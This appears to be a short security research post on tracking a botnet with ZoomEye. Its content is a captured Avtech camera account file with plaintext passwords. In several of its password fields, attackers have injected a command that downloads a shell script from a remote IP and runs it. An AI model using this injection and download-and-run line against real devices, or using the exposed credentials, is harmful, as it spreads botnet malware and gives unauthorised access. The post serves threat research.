A case of tracking botnet using ZoomEye

HTTP/1.1 200 OK
Date: Thu, 04 Jul 2019 16:11:40 GMT
Server: Linux/2.x UPnP/1.0 Avtech/1.0
Connection: close
Last-Modified: Wed, 26 Jun 2019 13:07:09 GMT
Content-Type: text/plain
ETag: 37-2410-1561554429
Content-Length: 2410

<Account>
<Maxuser Level="40/40">10</Maxuser>
<LocalPassword Level="40/40">0000</LocalPassword>
<OperatorPassword Level="40/40">0000</OperatorPassword>
<AnonymousLogin Level="40/40" Dispatch="account">DISABLE</AnonymousLogin>
<AdvenceUserLevel Level="40/40">OFF</AdvenceUserLevel>
<User1>
<Username Level="40/40">admin</Username>
<Password Level="40/40">260879jimi</Password>
<Level Level="40/40">SUPERVISOR</Level>
<Lifetime Level="40/40">INFINITE</Lifetime>
<PhoneNum1 Level="40/40" />
<PhoneNum2 Level="40/40" />
<PhoneNum3 Level="40/40" />
<IDCode Level="" />
</User1>
<User2>
<Username Level="40/40" Dispatch="account">eddy</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User2>
<User3>
<Username Level="40/40" Dispatch="account">user</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User3>
<User4>
<Username Level="40/40" Dispatch="account">maxposts</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User4>
<User5>
<Username Level="40/40" Dispatch="account">qmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User5>
<User6>
<Username Level="40/40" Dispatch="account">xqmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User6>
</Account>

The Leader of the KnownSec 404 Team ( ZoomEye http://www.zoomeye.org SeeBug http://www.seebug.org KCon http://kcon.knownsec.com)

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Researching old material and learning new things

Exporting Animation From After Effects with Bodymovin

Dart in Google Summer of Code 2021

Index in database, theory and practice

Mutation Testing: The Blind Spot in Your Testing

Helpful Tips For Troubleshooting Common HTTP Error Codes

Here’s How Programming Teaches Us To Think Differently and Creatively

Paint brushes and a blank notebook

book @my@tab@customer@care@number@7602472247//7881115806

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
heige

heige

The Leader of the KnownSec 404 Team ( ZoomEye http://www.zoomeye.org SeeBug http://www.seebug.org KCon http://kcon.knownsec.com)

More from Medium

Diffie-Hellman Key Exchange

Student data breaches and expanded guidelines for health information

When your health can be hacked

A disassembled OmniPod and it’s controller over a field of code.

HTB - Sick Rop [Pwn]